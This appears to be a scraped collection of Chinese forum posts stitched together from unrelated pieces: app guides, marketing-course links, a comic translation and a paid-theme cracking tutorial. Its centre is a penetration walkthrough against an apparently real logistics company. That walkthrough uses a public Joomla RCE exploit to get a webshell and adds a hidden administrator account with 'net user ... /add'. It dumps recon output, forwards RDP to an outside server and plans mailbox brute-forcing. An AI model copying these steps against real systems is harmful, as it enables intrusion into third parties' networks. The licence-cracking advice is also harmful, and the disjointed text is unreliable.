由此可以确认manager.paypal.com存在序列化漏洞，这个时候通常可以读取或者在PayPal的服务器上执行任意的命令了。
比如读取/etc/passwd的文件内容:

作者录了个视频并发给了PayPal获的了奖励。

这个漏洞告诉我们关注weblogic jboss...的同时也可以多留意下某些业务参数，或许也发现意外的惊喜。

这款软件2014年上架的时候我就首发汉化了，但是当时很多bug，确实用起来很不方便。现在一年多时间洗礼，相信你也会喜欢这个功能强大的应用。软件名称:     jimdo   软件语言: 原版截图

汉化版操作方式直播！

★打开软件后，选择新创建一个网站,左右滑动，挑一个喜欢的模板

★★★这里随意输入你喜欢的名字，作为日后访问你网站的域名。,然后点击下一个

★这里输入你的谷歌帐号。

如果没有的话需要自己先去创建一个哦，因为谷歌帐号用处很多，需要自己注册一个方便其它用途。

★★★好，输入完后点击下一个，接着输入谷歌帐号密码，再点击下一个

★然后就初步设置好了。等待创建成功！

这个过程要等好几分钟，根据网速决定。

这里跟大家说一下，不需要挂VPN创建，你什么都不用操作，等一下下就行了，不要画蛇添足～

OK，创建成功。

左上角功能键是帐号和你的多个网站显示。你刚刚开始所以只有一个网站。

右上角功能键是模板编辑，添加/删减/调整/图片编辑等

_______________________________________________________________________________________________________

_______________________________________________________________________________________________________

          键盘文字图制作、分割字、心形字等等几十种特效一键生成！            

0x00 前言

最近，因为工作原因一直也没时间更新博客。好不容易忙完了一阵，眼看就要过年了，先提前祝大家新年快乐！

很多时候，在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实，个人感觉一个完整的渗透（从黑客的角度去思考问题）应该是以尽一切可能获取目标的系统或者服务器的最高权限，尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以下几个方面：

信息刺探： 待渗透目标的系统，人员，组织信息等
漏洞侦测： 所有与待渗透目标相关的系统的漏洞侦测
系统提权： 利用现有的信息对已经获取的系统进行提权从而获取最高控制权限
内网渗透： 利用以获取的系统作为跳板进一步扩大战果，重复以上三步获取更多的系统权限和内网敏感信息

下面，是我分享地一个相对完整的渗透实战，仅供大家交流参考，所有的操作在本文公开以前均已恢复，请大家切勿用于非法目的。

0x01 信息刺探

作为渗透测试的第一步，也是最重要地一步便是信息刺探。孙子兵法有云：“知己知彼，百战不殆”。

首先是选择实战的目标站点，搜集到的信息如下：

URL: http://***.**.cn/ 外网IP地址：58.246.**.** 开放的端口（nmap）： 80， 443 注册信息（whois）： Domain Name: ***.sh.cn Registrant: 上海*****物流有限责任公司 Registrant Contact Email: cs@onlinebusiness.com.cn Sponsoring Registrar: 北京中科三方网络技术有限公司 Name Server: f1g1ns1.dnspod.net Name Server: f1g1ns2.dnspod.net Registration Time: 2001-07-26 00:00:00 Expiration Time: 2022-07-26 00:00:00 子域名信息: 116.236.199.**   mail2.***.sh.cn 180.166.3.**      import.***.sh.cn 58.246.81.**      query.***.sh.cn 58.246.81.**      mail.***.sh.cn 邮箱： liunian@***.sh.cn

从以上搜集到的信息，我们可以简单的分析一下接下来的渗透思路：

查找主站漏洞并利用
利用子站漏洞旁注进入系统搜集更多有用信息

0x02 漏洞侦测

按照上面的思路首先尝试寻找主站的漏洞，通常可通过AWVS或者其他的扫描工具做初步的扫描，看看会不会有可以利用的点。但是最简单直接的方法是打开这个站点，尽可能仔细的浏览每一可能有价值的页面，如下：

有没有发现，其实我们可以观察到一些很有价值的信息。从上面的信息，我们可以发现这个主站是基于Joomla CMS的，这个其实对我们接下来的渗透很有帮助，我们都知道最近爆出了Joomla的RCE和SQL注入漏洞，那么我们就可以去尝试看看这个站是否修复了这些漏洞。

于是，我们可以使用已经公开的exp(http://avfisher.win/archives/287)对其进行测试， 如下所示：

[+] vuls found! url: http://***.sh.cn/, System: Windows NT EESTSWEB01 6.1 build 7601 (Windows Server 2008 R2 Enterprise Edition Service Pack 1) i586 , document_root: C:/xampp/htdocs/*** , script_filename: C:/xampp/htdocs/***/index.php , shell_file: http://***.**.cn/***/****/1ndex.php

果然漏洞确实存在，而且我们也顺利地getshell了，那么是不是意味着我们的渗透已经结束了呢？no，no，no（重要的事情说3遍），其实真正的渗透才刚刚开始。

0x03 系统提权

我们发现这是一个Windows 2008 R2的服务器，既然我们已经拿到了webshell，接下来考虑的事情就应该是，我能不能获得管理员权限？

首先，在菜刀中执行命令： whoami 看看现在的shell是在什么权限下运行的，如下：

可以看出我们的shell是在system权限下运行的，那么也就表示我们可以很容易的添加一个管理员帐户，命令如下：

net user administer <password> /add net localgroup administrators administer /add

0x04 内网渗透

接下来，我们就需要经一步查看和收集系统的一些常见信息来帮助我们进一步的内网渗透，通常包括以下信息：

1. 系统信息 – systeminfo

主机名:           EESTSWEB01 OS 名称:          Microsoft Windows Server 2008 R2 Enterprise OS 版本:          6.1.7601 Service Pack 1 Build 7601 OS 制造商:        Microsoft Corporation OS 配置:          独立服务器 OS 构件类型:      Multiprocessor Free 注册的所有人:     Windows 用户 注册的组织: 产品 ID:          00486-OEM-8400691-20006 初始安装日期:     2015/5/14, 22:54:49 系统启动时间:     2015/8/3, 16:20:27 系统制造商:       Microsoft Corporation 系统型号:         Virtual Machine 系统类型:         x64-based PC 处理器:           安装了 2 个处理器。 [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz BIOS 版本:        American Megatrends Inc. 090006 , 2012/5/23 Windows 目录:     C:\Windows 系统目录:         C:\Windows\system32 启动设备:         \Device\HarddiskVolume1 系统区域设置:     zh-cn;中文(中国) 输入法区域设置:   zh-cn;中文(中国) 时区:             (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐 物理内存总量:     2,048 MB 可用的物理内存:   576 MB 虚拟内存: 最大值: 4,095 MB 虚拟内存: 可用:   2,647 MB 虚拟内存: 使用中: 1,448 MB 页面文件位置:     C:\pagefile.sys 域:               WORKGROUP 登录服务器:       暂缺 修补程序:         安装了 1 个修补程序。 [01]: KB976902 网卡:             安装了 1 个 NIC。 [01]: Microsoft 虚拟机总线网络适配器 连接名:      本地连接 启用 DHCP:   否 IP 地址 [01]: 192.168.0.10 [02]: fe80::98f7:e8a:3eeb:ff6

2. IP信息 – ipconfig /all

Windows IP 配置 主机名  . . . . . . . . . . . . . : EESTSWEB01 主 DNS 后缀 . . . . . . . . . . . : 节点类型  . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft 虚拟机总线网络适配器 物理地址. . . . . . . . . . . . . : 00-15-5D-00-02-01 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::98f7:e8a:3eeb:ff6%11(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.0.10(首选) 子网掩码  . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 192.168.0.230 DHCPv6 IAID . . . . . . . . . . . : 234886493 DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1C-E6-6D-9C-00-15-5D-00-02-01 DNS 服务器  . . . . . . . . . . . : 192.168.0.1 TCPIP 上的 NetBIOS  . . . . . . . : 已启用 隧道适配器 isatap.{ADD2E201-9C5D-480F-8E29-F722627ABA6E}: 媒体状态  . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 隧道适配器 Teredo Tunneling Pseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:7834:496d:18cf:134e:3f57:fff5(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::18cf:134e:3f57:fff5%18(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS  . . . . . . . : 已禁用

3. 开放的端口信息 – netstat -an

活动连接 协议  本地地址          外部地址        状态 TCP    0.0.0.0:80             0.0.0.0:0              LISTENING TCP    0.0.0.0:135            0.0.0.0:0              LISTENING TCP    0.0.0.0:443            0.0.0.0:0              LISTENING TCP    0.0.0.0:445            0.0.0.0:0              LISTENING TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING TCP    0.0.0.0:10050          0.0.0.0:0              LISTENING TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING TCP    192.168.0.10:80        125.39.30.131:11235    ESTABLISHED TCP    192.168.0.10:139       0.0.0.0:0              LISTENING TCP    192.168.0.10:10050     192.168.0.11:40635     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40637     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40645     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40656     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40755     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40786     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40798     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40811     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40829     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40945     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40980     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40986     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40991     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41006     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41115     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41148     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41161     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41171     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41187     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41306     TIME_WAIT TCP    [::]:80                [::]:0                 LISTENING TCP    [::]:135               [::]:0                 LISTENING TCP    [::]:443               [::]:0                 LISTENING TCP    [::]:445               [::]:0                 LISTENING TCP    [::]:3306              [::]:0                 LISTENING TCP    [::]:3389              [::]:0                 LISTENING TCP    [::]:10050             [::]:0                 LISTENING TCP    [::]:47001             [::]:0                 LISTENING TCP    [::]:49152             [::]:0                 LISTENING TCP    [::]:49153             [::]:0                 LISTENING TCP    [::]:49154             [::]:0                 LISTENING TCP    [::]:49155             [::]:0                 LISTENING TCP    [::]:49156             [::]:0                 LISTENING TCP    [::]:49157             [::]:0                 LISTENING TCP    [::1]:3306             [::1]:65055            TIME_WAIT TCP    [::1]:3306             [::1]:65056            TIME_WAIT TCP    [::1]:3306             [::1]:65057            TIME_WAIT TCP    [::1]:65055            [::1]:3306             TIME_WAIT TCP    [::1]:65056            [::1]:3306             TIME_WAIT TCP    [::1]:65057            [::1]:3306             TIME_WAIT TCP    [::1]:65058            [::1]:3306             TIME_WAIT TCP    [::1]:65059            [::1]:3306             TIME_WAIT UDP    0.0.0.0:500            *:* UDP    0.0.0.0:4500           *:* UDP    0.0.0.0:5355           *:* UDP    192.168.0.10:137       *:* UDP    192.168.0.10:138       *:* UDP    [::]:500               *:* UDP    [::]:4500              *:* UDP    [::]:5355              *:*

4. 运行的进程信息 – tasklist

映像名称                       PID 会话名              会话#       内存使用 ========================= ======== ================ =========== ============ System Idle Process              0 Services                   0         24 K System                           4 Services                   0        364 K smss.exe                       492 Services                   0      1,612 K csrss.exe                      576 Services                   0      8,184 K wininit.exe                    628 Services                   0      5,884 K services.exe                   728 Services                   0     13,224 K lsass.exe                      736 Services                   0     27,344 K lsm.exe                        744 Services                   0      7,500 K svchost.exe                    836 Services                   0     11,872 K svchost.exe                    916 Services                   0      9,888 K svchost.exe                   1000 Services                   0     22,876 K svchost.exe                    192 Services                   0     46,352 K svchost.exe                    592 Services                   0     17,884 K svchost.exe                    520 Services                   0     22,124 K svchost.exe                    932 Services                   0     21,616 K svchost.exe                   1084 Services                   0     14,688 K spoolsv.exe                   1248 Services                   0     20,832 K vmicsvc.exe                   1280 Services                   0      7,188 K vmicsvc.exe                   1332 Services                   0     10,788 K vmicsvc.exe                   1356 Services                   0      5,200 K vmicsvc.exe                   1384 Services                   0      5,540 K vmicsvc.exe                   1408 Services                   0      5,464 K httpd.exe                     1456 Services                   0     18,144 K svchost.exe                   1492 Services                   0     10,124 K mysqld.exe                    1540 Services                   0    474,496 K svchost.exe                   1636 Services                   0      3,740 K zabbix_agentd.exe             1708 Services                   0      8,416 K httpd.exe                     2064 Services                   0    204,668 K svchost.exe                   2748 Services                   0     10,340 K svchost.exe                   2784 Services                   0      6,744 K svchost.exe                   2716 Services                   0      5,560 K msdtc.exe                      572 Services                   0      8,416 K csrss.exe                     3428 Console                    2      7,100 K winlogon.exe                  2704 Console                    2      5,892 K LogonUI.exe                   3052 Console                    2     17,080 K mmc.exe                       1124 Services                   0     38,828 K csrss.exe                     1808 RDP-Tcp#0                  1     17,060 K winlogon.exe                   812 RDP-Tcp#0                  1      7,704 K taskhost.exe                  5040 RDP-Tcp#0                  1      8,212 K rdpclip.exe                   3608 RDP-Tcp#0                  1      8,072 K dwm.exe                       4772 RDP-Tcp#0                  1      7,032 K explorer.exe                  4968 RDP-Tcp#0                  1     79,612 K cmd.exe                       4920 RDP-Tcp#0                  1      3,820 K conhost.exe                   4624 RDP-Tcp#0                  1      6,052 K xampp-control.exe             4364 RDP-Tcp#0                  1     15,992 K taskmgr.exe                   4548 RDP-Tcp#0                  1     12,048 K TrustedInstaller.exe          3188 Services                   0      9,748 K cmd.exe                       3920 Services                   0      4,016 K conhost.exe                   3944 Services                   0      3,668 K cmd.exe                       2988 Services                   0      4,028 K tasklist.exe                  5036 Services                   0      6,148 K WmiPrvSE.exe                  3620 Services                   0      7,556 K

5. 局域网中公开的文件共享 – net view

服务器名称            注解 ------------------------------------------------------------------------------- \\EESHQAP02 \\EESHR                eeshr \\EESTS006 \\EESTSWEB01           Web Server \\EESTSWEB02 \\EESWEBSQL02 \\FORLOG               forlog share \\FORLOG-IIS \\JERRY                JERRY \\SMILINGM-2511FC 命令成功完成。

6. 局域网中的域的信息 – net view /domain

Domain ------------------------------------------------------------------------------- EES WORKGROUP 命令成功完成。

分析并提取有用信息：
主机名： EESTSWEB01
内网IP： 192.168.0.10
内网网关： 192.168.0.230
操作系统： Windows 2008 R2
所在域： WORKGROUP
杀毒软件：未发现
WEB服务器组件： XAMPP
端口： 80(HTTP), 3306(MySQL), 3389(RDP)
局域网所有的域： EES, WORKGROUP

根据上面的分析，我们发现目标服务器已经开放了RDP（3389）但是服务器是在内网我们无法直接外连。既然如此，我们可以考虑端口转发到我们自己的外网服务器然后在连接。

第一步, 上传端口转发工具（可以参考http://avfisher.win/archives/318）

第二步，外网服务器开启端口监听端口5001和5002

第三步，内网服务器开启端口转发，将本地端口3389转发到外网服务器监听的端口5002上

第四步，发起RDP外连外网服务器的端口5001

现在，我们已经成功地利用端口转发并RDP连接到了内网这台服务器上了。

打开XAMPP，我们可以很容易的查看网站的数据库数据：

为了进一步渗透内网，我们需要对内网进行扫描，看看内网开启了哪些服务，这里我推荐一款快速扫描内网的工具（MyLanViewer），结果如下：


内网的一些共享目录：（各种内部资料和信息）



一些内网的系统：
私有云云存储管理系统：（可以为共享目录设置权限）

无线路由器：（内网流量嗅探和截取）

打印机：（获取到了部分企业联系人的通讯录）


事实上，至此整个渗透仍旧没有结束，我们目前只是获得了一台WORKGROUP的服务器，而实际上仍旧有10几台服务器在EES域里，那么我们接下来该怎么突破呢？

其实可利用的思路还有很多，比如：

1. 结合上面我们在内网扫到的通讯录以及我们之前搜集到的子域名邮箱 mail.***.sh.cn（见0x01），我们可以先根据邮箱地址生成一个密码字典进行暴力破解，看看能不能在用户的邮箱中获取其他有用的信息

2. 继续挖掘和分析其他的子站可能存在的漏洞继而逐步突破

3. 尝试破解上面获得的无线路由器密码嗅探网络流量获取企业员工的用户名和密码

在此就不再深入下去了！总之，渗透是一门特别的艺术，必须善于运用一切已获取的信息不断变换思路最终达成目的。

0x05 总结

渗透是一个特别需要经验，细心和耐心的工作，你必须从黑客的角度去考虑每一个可能存在的漏洞进而利用并扩大战果。

总结上面的这次实战的结果，可以简单概括成以下几点：

耐心： 必须有足够的耐心去搜集目标的一切可能相关的信息
细心： 仔细地观察和了解你的目标，不放过每一个细节，从细节中获得突破口
思路： 善于总结和归纳所有的已知信息，并结合在平时积累的各种渗透思路进一步扩大战果
总结： 把每次实战中接触和学习到的东西总结起来并从中提取出实用的思路以便下次实战中的再次利用

原文地址

【前言】
Wind Punish网络安全团队翻译部的第一部作品终于诞生了，我们选择了密码学中经典的漫画《Alice and Bob》，作为我们的第一个项目。
Alice和Bob这一对情侣，就像是学校里英文教科书中的李雷和韩梅梅一样，他们奇妙而平凡的生活，陪伴许多人走过了学习的历程，如果没有Alice和Bob，
你会在密码学教科书上看到这样的描述：A 与某个声称自己是 B 的人通信。为了确保无误，A 必须先看看 B 是否知道密码 K。因此 A 向 B 发送了一段随机的 X，B 用 K 将 X 加密后得到 Y 并将 Y 回传给 A。
这只是密码学中一段非常简短的讲义，试想以下，如果在复杂的逻辑，混乱的符号下，密码学中的一些描述，将会让人十分头疼，但是正是因为有了Alice和Bob，他们甜蜜的情侣故事，他们生动可爱的漫画形象，让密码学中复杂的过程，变得清晰，简洁，正是因为有了他们，密码学变得那么亲切，所以Gordon先生才会自嘲地说，现在没人知道他在密码学上的成就（强素数概念的提出），提起他都是说“那个八卦 Alice 和 Bob 的家伙”。
我们翻译的这幅漫画，只是众多Alice和Bob故事中的一个，我们认为，我们翻译的不仅仅是一幅漫画，更是一种情怀，就像李雷和韩梅梅一样，代表了许多人学习时的记忆与情怀，这是一种特殊的意义。同时，我们认为Alice和Bob的漫画，代表了一种将知识与技术更有效，更智慧的传播的信念，也许我们的第一幅作品很短，但是，知识的意义，在与她的本质与灵魂，我们希望Wind Punish翻译部的第一幅作品，能作为我们一个良好的起点，未来，我们会由浅入深，为大家带来更多，更好的作品，欢迎大家关注我们Wind Punish网络安全团队翻译部！
最后，我们希望谨以此漫画，送给每一个曾经在密码学领域探索过的人，送给我们都有过的那一段，为了密码学探索过程中的困难而懊恼，为了破译出一个密码而喜悦的岁月，也送给我们都憧憬着的那一份美好的未来……
【作品】
漫画原版：
http://abstrusegoose.com/113

漫画中文版：

漫画解读：
爱丽丝和鲍勃是密码学里面很著名的人物，我们认为漫画深层的含义在于，没有私钥，密文确实很难被破译 但并非不能破译，依赖于现有机器，需要花费很长的时间，也是可能破译出来，RSA就是这样的例子，以前1024位的RSA破译是不现实的，但现在的确可以被破译了。安全或许只是相对的，没有绝对的安全，总有一天会被“破解”，真正的安全在于使用者自身的安全意识，用强度高的加密算法，信息就相对安全性高一点。

项目负责人： Wind Punish网络安全团队核心成员，翻译部负责人ziwen

漫画译者：   Wind Punish网络安全团队核心成员，翻译部负责人ziwen
Wind Punish网络安全团队成员sunshine
Wind Punish网络安全团队成员 海风

美术编辑：   Wind Punish网络安全团队统筹部成员 神秘

技术顾问：   Wind Punish网络安全团队核心成员，开发部负责人 in2

欢迎大家提供建议，我们相信，没有完美的作品，但我们会努力向着完美前进！欢迎大家关注我们Wind Punish网络安全团队翻译部的新作品，以及WP未来的其他项目！

【Wind Punish(风惩) 网络安全团队简介】：
团队官网: www.windpunish.net 
团队精神: 自由 共享 信仰 
团队宣传: 以风的力量 风的速度 惩戒有罪之人 
如果错过了一些辉煌，那么这一次就不要错过WP的成长！ 
我们的优势：成员来自乌云，补天，习科等知名漏洞响应平台, 
                    黑客团队，优秀的氛围，原创资料工具的一手获取 
                    团队一切活动将由团队成员投票决定

【名家点评】
http://localhost-8080.com/2014/02/story-of-alice-and-bob/
http://www.matrix67.com/blog/archives/1358

课程简介也许，你做了一个网站，却因为不懂SEO优化，不懂推广，而荒废掉了？也许，你做了一个网站，却因为无人维护、无人更新，没有任何收益？也许，你做了一个微信公众帐号，迟迟看不到经济效益，就放弃了？有没有一个更简单的，人人可以操作的网络工具，来帮助你的业务提升呢？答案是：有的，就是你我每天都在使用的QQ。        很多人都有自己的QQ,但是仅仅局限于聊天，传个资料，没有发现QQ的潜在营销价值，对于一些商家和个人来讲，最经济适用的就是QQ营销了，因为所有的一切基本都是免费的。想让你的QQ成为您的营销利器吗？您知道如何快速打造一个可以赚钱的QQ空间吗？只要你拥有一个QQ，任何人通过3个小时的学习，都可以把你的QQ打造成为你的24小时提款机。

链接: http://pan.baidu.com/s/1eRwbDpo 密码: 8b47

PS：千里之行始于足下，只有做才能成功

又是一个通宵，刚出去吃过早饭，视频教程也上传完毕。
一直说给各位来录制一个知更鸟begin主题的破解教程，但是一直没录制，前两天刚拿到最新版本的1.8版本主题包，正好有了原版主题包，所以就给各位录制一下，如何破解吧！
虽然1.8版本的主题增加了三个主题授权判断，但是不影响，旧版本的破解教程也是这样，只是去除了 后面的三个文件判断文件！！！！
视频是上传到乐视云点播里的，可能会出现转码后造成不清晰的问题，自己也观看了一边，的确有点不清晰，但是呢我博客里有文字版的破解教程，可以搭配来看！
博客地址就不发了，防止被版主认为打广告，另外此次发布的破解教程不提供主题包，所以有需要练手的朋友可以自行寻找原版主题进行破解练手！！

视频地址：http://yuntv.letv.com/bcloud.htm ... =640&height=360

依旧是不知道此板块如何贴视频。。。还是发视频连接吧，自己打开看吧1

一、打开 www.weidian.com，注册一个“微店”的帐号。已有的可以直接登录。

二、申请开通一个微店。

三、点击左侧导航下方的【加入购物号】

四、点击【前往QQ购物号】，使用你的QQ登录。

五、根据自己的条件，选择对应的类型。

个人和企业均可注册QQ购物号，所需资料和微信公众号基本一样。填写完资料，以后等待审核。

这里特别说明下这个版本和其他的版本的区别：1：支持微信连wifi的功能了，可以直接让用户自动选择关注微信公众号了。支持中文ssid
2：去掉了商户显示在线用户ip的功能，改为了显示在线用户是属于哪个路由器终端ID。可以在商户的路由管理处直接查看对应路由器，方便查询究竟我上网的用户是属于哪一个终端。

测试截图：

安装说明：
服务器要求：win2003或2008  iis或apache mysql5.1及以上 php5.2及以上 要支持伪静态
导入根目录下的数据库文件：www.52pojie.cn.sql
修改数据库配置文件：conf/db.php及site.php两个文件
商家登陆地址：域名/index.php
平台登陆地址：域名/ptadmin    用户名：admin 密码:admin
代{过}{滤}理商登陆地址：域名/dladmin
注意：如果以上2个链接打不开请检查你服务器的伪静态是否配置好（如果伪静态正常这2个链接是可以正常打开的），伪静态有问题以后的手机认证也会有问题的。

路由器wifidog协议配置：
认证服务器为你的服务器域名，认证端口为你服务器的端口， 认证路径为 / ，节点名称：你的路由的wan口的mac地址去掉冒号。

商家管理平台配置：
登陆商家管理平台，在路由管理->增加路由,名称自己定义，mac为你的路由的wan口的mac地址去掉冒号，路由器IP地址为你的路由器管理的IP地址，路由器网关portal端口为你的路由器的认证端口，可以先不管默认3000后保存，然后用手机测试，打开手机浏览器随便打开个网址，就会出现认证界面，这时看下手机浏览器的地址栏上面显示的地址port后面跟的那一组数字就是portal端口，记住后去商家管理平台路由管理->编辑路由填上正确的portal端口保存即可（如果此portal端口填写错误会导致微信一键认证不通过的）。

如果登陆时 提示 服务器忙 ，请检查数据库是否配置好。

以下2种方式不需要在路由器里加白名单就可以微信认证了：
微信认证页面，点立即认证后可临时上网（上网时长 在 “应用设置"->临时上网时间 里设置），这时会跳转到设置的微
信名称和二维码界面，这时手动打开微信，加关注微信后 回复 设置的关键词 收到回复的链接后点击链接就可认证成功。

微信密码认证页面，点去微信获取密码后可临时上网（上网时长 在 “应用设置"->临时上网时间 里设置），这时会跳转到设置的微信名称和二维码界面，这时手动打开微信，加关注微信后 回复 设置的关键词 收到回复的密码，再打开刚才的认证页面把密码输入进去点确认登陆就可以了。

短信认证内容模板：您好，欢迎光临本店，您的验证码是：$code，请在3分钟内完成验证，祝您购物愉快！
接收到短信后$code的位置就是密码。

如果应用设置里设置的手机认证短信选择了短信验证，那么在注册界面和手机登陆界面获取验证码都是需要真实的短信来验证，需要先在营销管理 短信账号管理，注册账号充值，在应用设置里设置短信认证内容后，才能正常获取短信验证码。

路由器添加域名白名单：map.baidu.com,api.map.baidu.com,s1.map.bdimg.com  （这是在首页点击商家地址后显示百度地图的
请修改程序使用editplus修改，不要使用记事本修改 否则会出问题的（百度搜索"editplus"下载）。
请使用IE9及以上的浏览器 并将浏览器设置成极速模式，否则打开会有点慢，后台显示会不全。链接http://pan.baidu.com/s/1pKxFS1d 密码m7pe

窗式、口号类广告的袭扰下，越来越多的用户对这类硬性广告产生反感的情绪，软文营销高性价比的优势逐渐凸显，对于网络营销来讲，不管是论坛营销、微博微信、博客营销，又或者是病毒式营销和事件营销，软文都以其非常强烈的指引式代入感渗透影响着用户的心理，一篇好的软文能引发用户自主购买、自发传播，产生裂变的效果。而一个好的软文营销高手，年薪百万不是梦想，你所需要的就是练就这些技能，成为一个高手。链接: http://pan.baidu.com/s/1qWY3weg 密码: bu55